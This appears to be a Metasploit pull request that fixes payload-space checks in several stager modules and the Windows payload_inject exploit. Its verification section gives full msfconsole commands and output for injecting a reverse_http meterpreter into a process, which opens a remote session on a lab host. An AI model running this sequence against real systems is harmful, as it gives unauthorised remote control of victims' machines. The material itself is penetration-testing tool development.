### PR TITLE
Fix the available size of payload for exploit/.../payload_inject

### DIFF
--- a/lib/msf/core/payload/linux/bind_tcp.rb
+++ b/lib/msf/core/payload/linux/bind_tcp.rb
@@ -30,7 +30,7 @@ module Payload::Linux::BindTcp
     }
 
     # Generate the more advanced stager if we have the space
-    unless self.available_space.nil? || required_space > self.available_space
+    if self.available_space && required_space < self.available_space
       conf[:exitfunk] = datastore['EXITFUNC'],
       conf[:reliable] = true
     end

--- a/lib/msf/core/payload/linux/reverse_tcp.rb
+++ b/lib/msf/core/payload/linux/reverse_tcp.rb
@@ -33,7 +33,7 @@ module Payload::Linux::ReverseTcp
     }
 
     # Generate the advanced stager if we have space
-    unless self.available_space.nil? || required_space > self.available_space
+    if self.available_space && required_space < self.available_space
       conf[:exitfunk] = datastore['EXITFUNC']
       conf[:reliable] = true
     end

--- a/lib/msf/core/payload/windows/bind_tcp.rb
+++ b/lib/msf/core/payload/windows/bind_tcp.rb
@@ -34,7 +34,7 @@ module Payload::Windows::BindTcp
     }
 
     # Generate the more advanced stager if we have the space
-    unless self.available_space.nil? || required_space > self.available_space
+    if self.available_space && required_space < self.available_space
       conf[:exitfunk] = datastore['EXITFUNC'],
       conf[:reliable] = true
     end

--- a/lib/msf/core/payload/windows/bind_tcp_rc4.rb
+++ b/lib/msf/core/payload/windows/bind_tcp_rc4.rb
@@ -32,7 +32,7 @@ module Payload::Windows::BindTcpRc4
     }
 
     # Generate the more advanced stager if we have the space
-    unless self.available_space.nil? || required_space > self.available_space
+    if self.available_space && required_space < self.available_space
       conf[:exitfunk] = datastore['EXITFUNC'],
       conf[:reliable] = true
     end

--- a/lib/msf/core/payload/windows/reverse_http.rb
+++ b/lib/msf/core/payload/windows/reverse_http.rb
@@ -50,7 +50,7 @@ module Payload::Windows::ReverseHttp
     }
 
     # Add extra options if we have enough space
-    unless self.available_space.nil? || required_space > self.available_space
+    if self.available_space && required_space < self.available_space
       conf[:url]        = luri + generate_uri
       conf[:exitfunk]   = datastore['EXITFUNC']
       conf[:ua]         = datastore['MeterpreterUserAgent']

--- a/lib/msf/core/payload/windows/reverse_tcp.rb
+++ b/lib/msf/core/payload/windows/reverse_tcp.rb
@@ -34,7 +34,7 @@ module Payload::Windows::ReverseTcp
     }
 
     # Generate the advanced stager if we have space
-    unless self.available_space.nil? || required_space > self.available_space
+    if self.available_space && required_space < self.available_space
       conf[:exitfunk] = datastore['EXITFUNC']
       conf[:reliable] = true
     end

--- a/lib/msf/core/payload/windows/reverse_tcp_dns.rb
+++ b/lib/msf/core/payload/windows/reverse_tcp_dns.rb
@@ -38,7 +38,7 @@ module Payload::Windows::ReverseTcpDns
     }
 
     # Generate the advanced stager if we have space
-    unless self.available_space.nil? || required_space > self.available_space
+    if self.available_space && required_space < self.available_space
       conf[:exitfunk] = datastore['EXITFUNC']
       conf[:reliable] = true
     end

--- a/lib/msf/core/payload/windows/reverse_tcp_rc4.rb
+++ b/lib/msf/core/payload/windows/reverse_tcp_rc4.rb
@@ -34,7 +34,7 @@ module Payload::Windows::ReverseTcpRc4
     }
 
     # Generate the advanced stager if we have space
-    unless self.available_space.nil? || required_space > self.available_space
+    if self.available_space && required_space < self.available_space
       conf[:exitfunk] = datastore['EXITFUNC']
       conf[:reliable] = true
     end

--- a/lib/msf/core/payload/windows/reverse_tcp_rc4_dns.rb
+++ b/lib/msf/core/payload/windows/reverse_tcp_rc4_dns.rb
@@ -34,7 +34,7 @@ module Payload::Windows::ReverseTcpRc4Dns
     }
 
     # Generate the advanced stager if we have space
-    unless self.available_space.nil? || required_space > self.available_space
+    if self.available_space && required_space < self.available_space
       conf[:exitfunk] = datastore['EXITFUNC']
       conf[:reliable] = true
     end

--- a/lib/msf/core/payload/windows/reverse_winhttp.rb
+++ b/lib/msf/core/payload/windows/reverse_winhttp.rb
@@ -36,7 +36,7 @@ module Payload::Windows::ReverseWinHttp
     }
 
     # Add extra options if we have enough space
-    unless self.available_space.nil? || required_space > self.available_space
+    if self.available_space && required_space < self.available_space
       conf[:uri]              = generate_uri
       conf[:exitfunk]         = datastore['EXITFUNC']
       conf[:verify_cert_hash] = opts[:verify_cert_hash]

--- a/lib/msf/core/payload/windows/x64/bind_tcp.rb
+++ b/lib/msf/core/payload/windows/x64/bind_tcp.rb
@@ -32,7 +32,7 @@ module Payload::Windows::BindTcp_x64
     }
 
     # Generate the more advanced stager if we have the space
-    unless self.available_space.nil? || required_space > self.available_space
+    if self.available_space && required_space < self.available_space
       conf[:exitfunk] = datastore['EXITFUNC'],
       conf[:reliable] = true
     end

--- a/lib/msf/core/payload/windows/x64/reverse_http.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_http.rb
@@ -54,7 +54,7 @@ module Payload::Windows::ReverseHttp_x64
     }
 
     # add extended options if we do have enough space
-    unless self.available_space.nil? || required_space > self.available_space
+    if self.available_space && required_space < self.available_space
       conf[:url]        = luri + generate_uri
       conf[:exitfunk]   = datastore['EXITFUNC']
       conf[:ua]         = datastore['MeterpreterUserAgent']

--- a/lib/msf/core/payload/windows/x64/reverse_tcp.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_tcp.rb
@@ -41,7 +41,7 @@ module Payload::Windows::ReverseTcp_x64
     }
 
     # Generate the advanced stager if we have space
-    unless self.available_space.nil? || required_space > self.available_space
+    if self.available_space && required_space < self.available_space
       conf[:exitfunk] = datastore['EXITFUNC']
       conf[:reliable] = true
     end

--- a/lib/msf/core/payload/windows/x64/reverse_winhttp.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_winhttp.rb
@@ -37,7 +37,7 @@ module Payload::Windows::ReverseWinHttp_x64
     }
 
     # Add extra options if we have enough space
-    unless self.available_space.nil? || required_space > self.available_space
+    if self.available_space && required_space < self.available_space
       conf[:uri]              = generate_uri
       conf[:exitfunk]         = datastore['EXITFUNC']
       conf[:verify_cert_hash] = opts[:verify_cert_hash]

--- a/modules/exploits/windows/local/payload_inject.rb
+++ b/modules/exploits/windows/local/payload_inject.rb
@@ -14,29 +14,29 @@ class MetasploitModule < Msf::Exploit::Local
 
   def initialize(info={})
     super( update_info( info,
-      'Name'          => 'Windows Manage Memory Payload Injection',
-      'Description'   => %q{
+      'Name'            => 'Windows Manage Memory Payload Injection',
+      'Description'     => %q{
           This module will inject a payload into memory of a process.  If a payload
         isn't selected, then it'll default to a reverse x86 TCP meterpreter.  If the PID
         datastore option isn't specified, then it'll inject into notepad.exe instead.
       },
-      'License'       => MSF_LICENSE,
-      'Author'        =>
+      'License'         => MSF_LICENSE,
+      'Author'          =>
         [
           'Carlos Perez <carlos_perez[at]darkoperator.com>',
           'sinn3r'
         ],
-      'Platform'      => [ 'win' ],
-      'Arch'          => [ ARCH_X86, ARCH_X86_64 ],
-      'SessionTypes'  => [ 'meterpreter' ],
-      'Targets'       => [ [ 'Windows', {} ] ],
+      'Platform'        => [ 'win' ],
+      'Arch'            => [ ARCH_X86, ARCH_X86_64 ],
+      'SessionTypes'    => [ 'meterpreter' ],
+      'Targets'         => [ [ 'Windows', {} ] ],
       'Payload'         =>
         {
           'Space'       => 4096,
           'DisableNops' => true
         },
-      'DefaultTarget' => 0,
-      'DisclosureDate'=> "Oct 12 2011"
+      'DefaultTarget'   => 0,
+      'DisclosureDate'  => "Oct 12 2011"
     ))
 
     register_options(

--- a/modules/exploits/windows/local/payload_inject.rb
+++ b/modules/exploits/windows/local/payload_inject.rb
@@ -30,6 +30,11 @@ class MetasploitModule < Msf::Exploit::Local
       'Arch'          => [ ARCH_X86, ARCH_X86_64 ],
       'SessionTypes'  => [ 'meterpreter' ],
       'Targets'       => [ [ 'Windows', {} ] ],
+      'Payload'         =>
+        {
+          'Space'       => 4096,
+          'DisableNops' => true
+        },
       'DefaultTarget' => 0,
       'DisclosureDate'=> "Oct 12 2011"
     ))


### PR DESCRIPTION
The old code loses proxy and other options in lib/msf/core/payload/windows/reverse_http.rb.
## Verification

To perform the following requires a proxy server.
- [x] Start `msfconsole`
- [x] Create a meterpreter session.
- [x] `use exploit/windows/local/payload_inject`
- [x] `set PAYLOAD windows/meterpreter/reverse_http`
- [x] `set LHOST XXXX`
- [x] `set LPORT XXXX`
- [x] `set SESSION XX`
- [x] `set NEWPROCESS true`
- [x] `set PayloadProxyHost XXXX`
- [x] `set PayloadProxyPort XXXX`
- [x] `set PayloadProxyUser XXXX`
- [x] `set PayloadProxyPass XXXX`
- [x] `exploit`
### Old code

```
msf > sessions

Active sessions
===============

  Id  Type                   Information                     Connection
  --  ----                   -----------                     ----------
  1   meterpreter x86/win32  PC-UI12RT78\user @ PC-UI12RT78  10.0.0.82:8080 -> 10.0.0.80:45678 (fe80::ed33:5bed:7261:eb23)

msf > use exploit/windows/local/payload_inject
msf exploit(payload_inject) > set PAYLOAD windows/meterpreter/reverse_http
PAYLOAD => windows/meterpreter/reverse_http
msf exploit(payload_inject) > set LHOST 10.0.0.82
LHOST => 10.0.0.82
msf exploit(payload_inject) > set LPORT 80
LPORT => 80
msf exploit(payload_inject) > set PayloadProxyHost 192.168.56.80
PayloadProxyHost => 192.168.56.80
msf exploit(payload_inject) > set PayloadProxyPort 8080
PayloadProxyPort => 8080
msf exploit(payload_inject) > set PayloadProxyUser proxyuser
PayloadProxyUser => proxyuser
msf exploit(payload_inject) > set PayloadProxyPass proxypassword
PayloadProxyPass => proxypassword
msf exploit(payload_inject) > set SESSION 1
SESSION => 1
msf exploit(payload_inject) > set NEWPROCESS true
NEWPROCESS => true
msf exploit(payload_inject) > exploit

[*] Started HTTP reverse handler on http://10.0.0.82:80
[*] Running module against PC-UI12RT78
[*] Launching notepad.exe...
[*] Preparing 'windows/meterpreter/reverse_http' for PID 5072
[*] Exploit completed, but no session was created.
msf exploit(payload_inject) > 
```
### New code

```
msf > sessions

Active sessions
===============

  Id  Type                   Information                     Connection
  --  ----                   -----------                     ----------
  1   meterpreter x86/win32  PC-UI12RT78\user @ PC-UI12RT78  10.0.0.82:8080 -> 10.0.0.80:40758 (fe80::ed33:5bed:7261:eb23)

msf > use exploit/windows/local/payload_inject
msf exploit(payload_inject) > set PAYLOAD windows/meterpreter/reverse_http
PAYLOAD => windows/meterpreter/reverse_http
msf exploit(payload_inject) > set LHOST 10.0.0.82
LHOST => 10.0.0.82
msf exploit(payload_inject) > set LPORT 80
LPORT => 80
msf exploit(payload_inject) > set PayloadProxyHost 192.168.56.80
PayloadProxyHost => 192.168.56.80
msf exploit(payload_inject) > set PayloadProxyPort 8080
PayloadProxyPort => 8080
msf exploit(payload_inject) > set PayloadProxyUser proxyuser
PayloadProxyUser => proxyuser
msf exploit(payload_inject) > set PayloadProxyPass proxypassword
PayloadProxyPass => proxypassword
msf exploit(payload_inject) > set SESSION 1
SESSION => 1
msf exploit(payload_inject) > set NEWPROCESS true
NEWPROCESS => true
msf exploit(payload_inject) > exploit

[*] Started HTTP reverse handler on http://10.0.0.82:80
[*] Running module against PC-UI12RT78
[*] Launching notepad.exe...
[*] Preparing 'windows/meterpreter/reverse_http' for PID 3984
[*] http://10.0.0.82:80 handling request from 10.0.0.80; (UUID: odhtt6xl) Staging Native payload...
[*] Meterpreter session 2 opened (10.0.0.82:80 -> 10.0.0.80:50180) at 2016-06-09 11:00:58 +0900

meterpreter > sysinfo
Computer        : PC-UI12RT78
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter >
```
